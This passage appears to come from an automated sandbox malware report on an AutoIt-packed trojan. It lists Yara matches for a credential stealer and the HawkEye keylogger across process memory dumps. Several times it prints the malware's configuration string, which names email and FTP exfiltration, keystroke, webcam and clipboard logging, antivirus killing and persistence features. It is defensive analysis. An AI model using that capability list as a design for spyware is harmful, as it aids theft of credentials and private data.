Source: Yara match File source: 9.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.68066c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.711261724.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935706763.0000000006751000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.710842055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933727810.0000000002A72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.890465064.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935121039.00000000064D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.730525436.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.890023038.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.730142984.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.936518834.0000000006A82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6752, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected HawkEye Keylogger
Source: Yara match File source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Detected HawkEye Rat
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: RegAsm.exe, 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: RegAsm.exe, 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs